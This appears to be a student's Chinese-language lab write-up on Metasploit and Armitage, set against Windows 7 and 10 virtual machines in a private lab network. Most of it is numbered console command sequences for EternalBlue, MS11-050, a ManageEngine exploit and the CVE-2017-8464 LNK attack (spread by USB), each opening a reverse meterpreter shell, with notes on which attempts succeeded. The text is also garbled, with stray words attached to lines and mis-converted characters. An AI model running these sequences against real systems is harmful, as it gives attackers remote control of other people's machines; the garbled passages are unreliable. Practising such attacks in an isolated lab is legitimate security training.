ms08_067(win7)
payload/generic/shell_reverse_tcp
(失敗)payload/windows/meterpreter/reverse_tcp
(失敗)ms17_010_eternalblue(win7)
payload/windows/x64/meterpreter/reverse_tcp
(成功)ms11_050(win7)
(成功)ms14_064(win7)
exploit/windows/browser/ms14_064_ole_code_execution (失敗)
Exploit Modules
:攻擊漏洞,把shellcode
"背"過去Auxiliary Modules
:在進行滲透攻擊以前獲得目標系統豐富的情報信息,它是攻擊的前提攻擊載荷Payload Modules
:載荷,一段指令(shellcode),目標系統在被滲透攻擊以後去執行的代碼Nop Modules
shellcode
的起始地址,因此加入nops
以增長攻擊成功的機率Encoders
後滲透攻擊模塊Post
:攻擊成功以後,動態傳輸代碼使其在被控機執行payload
形狀,使得不出現特定字符/usr/share/metasploit-framework/modules
info [exploits|auxiliary|post|payloads|encoders|nops]
show [options]
show [target]
search
search ms16 type:exploit platform:windows
service postgresql start
armitage
generic/shell_reverse_tcp
經過菜單欄圖標直接打開Armitag
html
根據已知信息推導出目標主機所在網段的IP,掃描目標網段完整信息,確認目標網絡拓撲結構以實施網絡偵查。依次選擇Hosts->Nmap Scan->Quick Scan(OS detect)web
虛擬機所在網段位192.168.80.0/24sql
Win10虛擬機IP信息shell
掃描後獲得網段中4個虛擬機包括主機windows
選中靶機192.168.80.137,右鍵選擇Services,查看靶機上開啓的服務:api
選中靶機192.168.80.137,右鍵選擇Scan,Armitage會調用Metasploit的漏洞掃描模塊,定向掃描靶機,尋找存在的漏洞,爲下一步肯定攻擊方法提供參考依據瀏覽器
可見相似前幾回實驗在Metasploit中手動配置主機號、端口號等設置如今通通直接自動化了!服務器
利用上一步中漏洞掃描獲得的漏洞信息,自動搜索Metasploit攻擊模塊庫,尋找合適的攻擊模塊。選中靶機192.168.80.137,依次選擇菜單欄Attacks->Find Attacks,Armitage會開始自動搜索尋找合適的攻擊模塊:網絡
在利用Armitage完成對靶機的攻擊模塊自動化搜索之後,選中192.168.80.137機右鍵能夠發現多了Attack菜單。依次選擇Attack->smb->ms08_067_netapi菜單,選擇smb漏洞下的ms08_067漏洞對WIN7靶機進行攻擊(也能夠在Armitage左側樹型目錄下依次選擇exploit->windows->smb->ms08_067_netapi找到該漏洞):app
launch一下,不行!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
爲啥???而後我去看了一下適用系統,沒有win7我哭了,我以前在作啥子?
依然鐵頭娃,此次手動配置(確定是能成功的)
1 use auxiliary/scanner/smb/smb_ms17_010 2 set RHOST 192.168.80.141
3 Run 4 Back 5 search ms17_010 6 use exploit/windows/smb/ms17_010_eternalblue 7 set RHOST 192.168.80.141
8 show options 9 set payload windows/meterpreter/reverse_tcp 10 set LHOST 192.168.80.130
11 run
1 search ms11_050 2 use exploit/windows/browser/ms11_050_mshtml_cobjectelement 3 set srvhost 192.168.80.130
4 set payload windows/meterpreter/reverse_tcp 5 set LHOST 192.168.80.130
6 show targets 7 set target 4
8 Run 9 http://192.168.80.130:8080/zrCOkaFC
靶機:Windows 10
1 use exploit/windows/http/manageengine_appmanager_exec 2 show options 3 set RHOST 192.168.80.136
4 Set RPORT 6305
5 set LHOST 192.168.80.130
6 set payload windows/meterpreter/reverse_tcp 7 exploit
1 use exploit/windows/fileformat/cve_2017_8464_lnk_rce 2 set payload windows/meterpreter/reverse_tcp 3 set LHOST 192.168.80.130 4 exploit 5 cp -r /root/.msf4/local/ /media/root/KINGSTON 6 use multi/handler 7 set paylaod windows/meterpreter/reverse_tcp 8 set LHOST 192.168.80.130 9 Exploit
這裏要注意系統要開啓U盤自動播放,若是沒開啓雙擊第一個文件就行
實驗感想
作攻擊以前,要看看攻擊對當前版本是否可行,避免出現鐵頭娃現象。對於不一樣的攻擊,可能有一次不行以後就成功的現象,要屢次嘗試分析其中的緣由才能進行判斷。因爲個人實驗中基本使用win7和win10,因此大部分早起漏洞都修補了,找新漏洞就有些困難,尤爲是win10找了半天才試出來一個,幸虧那個漏洞軟件公司沒有修補,要再也不找一個惟一還會花很長時間。